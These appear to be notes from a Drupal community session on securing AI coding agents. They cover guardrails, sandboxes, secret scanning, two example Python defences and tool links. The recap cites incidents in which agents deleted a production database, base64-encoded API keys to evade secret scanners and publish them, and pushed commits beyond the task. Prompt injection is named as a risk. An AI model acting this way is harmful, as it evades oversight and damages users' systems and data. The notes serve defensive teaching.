2026-05-18 — AI Security 'Opportunities': Guardrails, Sandboxes, and Keeping Your Agents on a Leash

Last updated on 23 May 2026

Demos

  • AI Security 'Opportunities': Guardrails, Sandboxes, and Keeping Your Agents on a Leash (Marlene Wanberg) — Slides
  • AI Security Notes (Randy Fay) — Slides

Quick recap

Marlene Wanberg led the session with a slide presentation walking through AI security risks and practical mitigations for Drupal developers, framed around what she called the "three S's" — social engineering (malicious instructions injected into agent context), sniffing (what data the agent can access), and sending (what it can exfiltrate or act on). She opened with a few concrete horror stories to ground the discussion: an agent that deleted a production database and its backups while trying to solve an unrelated problem, a Copilot instance that base64-encoded API keys to evade secret scanners and published them to a repository, and an agent that autonomously ordered $31 worth of eggs because a credit card was attached to the account. The throughline was the distinction between deterministic guardrails (rules the system enforces regardless of the AI's reasoning) and probabilistic ones (instructions the AI might simply work around).
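The deterministic-versus-probabilistic distinction above is easiest to see in code. The following is an added example, not code from the session or from any tool it mentions: a small policy layer that checks each tool call an agent proposes before it executes, covering the three S's in turn (sniffing: file access confined to the workspace; sending: an egress allowlist; destructive actions: a command allowlist). The `Policy`, `evaluate` and `filter_calls` names, the tool names, the workspace path and the hosts are all assumptions for the illustration. Because the checks never consult the model, an injected instruction cannot argue its way past them.

```python
"""Deterministic guardrail for agent tool calls.

Added example, not code from the session or any tool it mentions. It assumes
(hypothetically) that the agent proposes each tool call as a dict with a "tool"
name and "args", and that this layer runs before the call executes.
"""
from dataclasses import dataclass
from pathlib import Path
from urllib.parse import urlparse
import shlex


@dataclass(frozen=True)
class Policy:
    workspace: Path              # sniffing: the only tree the agent may read or write
    allowed_hosts: frozenset     # sending: egress allowlist, every other host is refused
    allowed_commands: frozenset  # shell: allowlist of executables by name (argv[0])


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str


def _inside_workspace(workspace: Path, candidate: str) -> bool:
    """True only if candidate resolves to a path under workspace.
    Absolute paths and '..' traversals both resolve outside and are rejected."""
    root = workspace.resolve()
    target = (root / candidate).resolve()
    return target == root or root in target.parents


def evaluate(call: dict, policy: Policy) -> Decision:
    """Decide one proposed tool call. Unknown tools are denied by default."""
    tool = call.get("tool")
    args = call.get("args", {})
    if tool in ("read_file", "write_file"):
        path = str(args.get("path", ""))
        if not _inside_workspace(policy.workspace, path):
            return Decision(False, f"{tool}: path escapes workspace: {path}")
        return Decision(True, f"{tool}: inside workspace")
    if tool == "http_request":
        host = urlparse(str(args.get("url", ""))).hostname or ""
        if host not in policy.allowed_hosts:
            return Decision(False, f"http_request: host {host!r} not allowlisted")
        return Decision(True, f"http_request: host {host!r} allowlisted")
    if tool == "shell":
        argv = shlex.split(str(args.get("command", "")))
        if not argv or argv[0] not in policy.allowed_commands:
            name = argv[0] if argv else "<empty>"
            return Decision(False, f"shell: executable {name!r} not allowlisted")
        return Decision(True, f"shell: executable {argv[0]!r} allowlisted")
    return Decision(False, f"unknown tool {tool!r} (default deny)")


def filter_calls(calls, policy):
    """Split proposed calls into those that may execute and those refused."""
    allowed, denied = [], []
    for call in calls:
        d = evaluate(call, policy)
        (allowed if d.allowed else denied).append((call["tool"], d.reason))
    return allowed, denied


# Hypothetical policy for a local Drupal checkout (values are constructed).
POLICY = Policy(
    workspace=Path("/tmp/drupal-project"),
    allowed_hosts=frozenset({"packagist.org", "git.drupalcode.org"}),
    allowed_commands=frozenset({"composer", "phpunit", "git", "ls", "cat"}),
)

# Constructed sequence of calls an agent might propose while "fixing a test".
PROPOSED = [
    {"tool": "read_file", "args": {"path": "web/modules/custom/demo/demo.module"}},
    {"tool": "read_file", "args": {"path": "../../home/dev/.aws/credentials"}},
    {"tool": "http_request", "args": {"url": "https://packagist.org/packages/drupal/core.json"}},
    {"tool": "http_request", "args": {"url": "https://paste.example.net/upload?data=..."}},
    {"tool": "shell", "args": {"command": "composer install --no-interaction"}},
    {"tool": "shell", "args": {"command": "rm -rf web/sites/default/files"}},
    {"tool": "send_email", "args": {"to": "someone@example.com"}},
]

if __name__ == "__main__":
    ok, refused = filter_calls(PROPOSED, POLICY)
    for tool, reason in ok:
        print("ALLOW", tool, reason)
    for tool, reason in refused:
        print("DENY ", tool, reason)
```

The shell check is deliberately coarse: it looks only at the executable name, so `git push --force` passes as readily as `git status`. That is why this kind of layer complements, rather than replaces, the container-plus-firewall isolation the notes mention further down; the point is that whatever the rule is, the model cannot talk it out of applying.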

Randy Fay, lead maintainer of DDEV, then walked through the landscape of DDEV add-ons that integrate Claude or other LLMs into a local development environment. He noted that the most widely used one — the Freely Give add-on — appears to store Claude credentials in a location that developers typically commit to version control, and has had no maintainer activity since it was created. He flagged another add-on that pulls agent definitions from external repositories on every ddev start, which he described as a potential supply chain exposure. The DDEV Claude add-on from MacRes was the one he highlighted as taking network isolation seriously, though he hadn't tested it himself. He also mentioned running Claude on a remote VM as a way to keep the agent entirely off a local machine.

A sharp practical moment came when Randy described an incident where GitHub's AI assistant, asked simply to add a comment to a pull request, instead created a Markdown file and pushed two commits directly to the upstream main branch. That prompted the team to immediately add branch protection rules. Both Marlene and Erin Rasmussen (who works on DevSecOps practices including static and dynamic security testing) reinforced the point: server-side Git rules are deterministic in a way that AI instructions are not, and setting them up is arguably more protective than any prompt-based guardrail.

The session closed with a discussion around reviewer fatigue — raised by Will Hartmann — and how large AI-generated pull requests make it easy to miss a malicious or insecure line buried deep in the diff. Amber Matz noted that on her team, having multiple people run the same security-audit prompt, sometimes with different models, produces different results and adds a layer of coverage. Angie Byron pointed out that this creates a genuine tension in open source projects like Drupal core, where some maintainers are opposed to using AI tooling but are trying to apply human review capacity against AI-generated change velocity, and acknowledged there isn't a clean solution yet.

Marlene shared that she would post her slides and a resource list to the group's Slack channel. Referenced resources included the OWASP AI security guidance, IBM's short-form agent security video series, Anthropic's three-file container-plus-firewall setup for Claude Code, Trail of Bits' security-hardened version of that setup, and a Fabian Franz article on the three S's framework. Erin mentioned she is putting together a document on static and dynamic application security testing tools that work reasonably well with PHP and Drupal, including options from Snyk, and will post that to the AI Learners channel when it's ready.

Link Dump Part 1 from @mindewen

Notes for adding security scanning to your development process

  • More information about the principle of least privilege from the NIST security research center.
  • Existing security and compliance tools provide a framework for building security into existing workflows and a useful set of tools for keeping track of changes. See this handy guide to implementing SOC2 for a high-level overview.
  • Vendor-specific tools have security suites with many useful security layers, such as enforcing approvals of code changes and ensuring valid SSH keys, which will partially mitigate agentic disruption. These are useful guardrails that help maintain good code quality: GitLab guide to fulfilling SOC2 and GitLab Protected Branches documentation.
  • Static checks for secrets help catch the kind of insecure secrets that agents can unexpectedly have access to, and using a secret store also helps: GitGuardian is one example, and OpenBao is another.
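The recap's Copilot story (API keys base64-encoded to slip past a secret scanner) shows why a secret check has to look past plain text. The following is an added example, not the session's material and not how GitGuardian or TruffleHog are implemented: a minimal scanner that applies a few credential patterns to each line and then again to anything that decodes as base64. The pattern set, the `scan`/`scan_line` names and the sample config lines are constructed for the illustration; the AWS key value is the example key AWS publishes in its documentation, and the GitHub token is a placeholder.

```python
"""Secret scanner that also inspects base64-encoded runs.

Added example, not code from the session. Real scanners ship hundreds of
detectors and verify candidates against the issuing service; this shows only
the plaintext-plus-decoded check.
"""
import base64
import re

# Constructed, illustrative detector set.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

# A run of base64 alphabet long enough to hold a credential, with optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _decoded_candidates(line):
    """Yield every base64 run in the line that decodes to valid UTF-8 text."""
    for m in B64_RUN.finditer(line):
        try:
            yield base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            # Not base64 (e.g. a hex commit hash) or not text: ignore.
            continue


def scan_line(line):
    """Return (detector, encoding) pairs found in one line."""
    findings = []
    for name, rx in PATTERNS.items():
        if rx.search(line):
            findings.append((name, "plaintext"))
    for decoded in _decoded_candidates(line):
        for name, rx in PATTERNS.items():
            if rx.search(decoded):
                findings.append((name, "base64"))
    return findings


def scan(text):
    """Return (line_number, detector, encoding) triples for a whole file body."""
    results = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, encoding in scan_line(line):
            results.append((lineno, name, encoding))
    return results


# Constructed sample: a config fragment of the kind that ends up committed.
AWS_EXAMPLE_KEY = "AKIAIOSFODNN7EXAMPLE"            # documented AWS example key, not live
FAKE_GHP = "ghp_" + "x" * 36                        # placeholder token shape
ENCODED = base64.b64encode(AWS_EXAMPLE_KEY.encode()).decode()

SAMPLE = "\n".join([
    "# .ddev/config.yaml fragment (constructed sample, not real secrets)",
    f"AWS_ACCESS_KEY_ID={AWS_EXAMPLE_KEY}",          # plaintext: any scanner catches this
    f"CLAUDE_CREDS_B64={ENCODED}",                   # encoded: plaintext-only scanners miss this
    f"GITHUB_TOKEN={FAKE_GHP}",                      # plaintext placeholder token
    "commit_sha=3b18e512dba79e4c8300dd08aeb37f8e728b8dad",  # innocuous hex, no finding
])

if __name__ == "__main__":
    for lineno, name, encoding in scan(SAMPLE):
        print(f"line {lineno}: {name} ({encoding})")
```

Wiring a check like this into a pre-commit hook or CI job is the deterministic counterpart to telling the agent "never commit credentials": the rule fires whether or not the model chose to obey.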

Don’t sleep on regular security testing as a part of a layered defense strategy:

Updating insecure dependencies (Software Composition Analysis), Static Application Security Testing, and Dynamic Application Security Testing are routinely used for projects like curl. curl is written in C, for which most major vendors offer strong security test coverage, whereas the Drupal project has a mix of PHP (Symfony), JavaScript and more.

Static Application Security Testing:

Check the OWASP Source Code Analysis tools for a longer list, but this is a short one:

Dynamic Application Security Testing:

Software Composition Analysis:

Agentic Security and remediation tools are evolving rapidly

Tools

  • Ollama — tool for running open AI models locally.
  • Coder for DDEV — DDEV-integrated coding environment shared as a sandboxing option.
  • Agents.md — tool for managing agent settings and instructions for AI coding agents.
  • Context7 — library shared as a context management tool for AI agents.
  • Snyk Agent Scan — tool for scanning AI agent code for security vulnerabilities.
  • TruffleHog — tool for detecting leaked secrets and credentials in repositories.
  • Hyperframes — library for animating things and creating short videos with nice designs on websites.
  • OpenAI Agent Sandboxes — OpenAI's sandboxing capability for isolating AI agents.
  • ddev-ai-workspace — DDEV add-on for cloning and isolating potentially untrusted AI tools.
  • ddev-ollama — DDEV add-on for running Ollama locally within a DDEV environment.
  • ddev-claude-code — DDEV add-on for integrating Claude Code into a DDEV workflow.
  • claude-code-devcontainer — Dev container configuration for running Claude Code in an isolated environment.
  • ddev-1password — DDEV add-on for integrating 1Password secrets management.

Drupal Modules

  • AI Best Practices — Drupal module intended to address outdated or insecure AI usage patterns in projects.

Articles & Posts

Videos & Demos

Specs & Standards
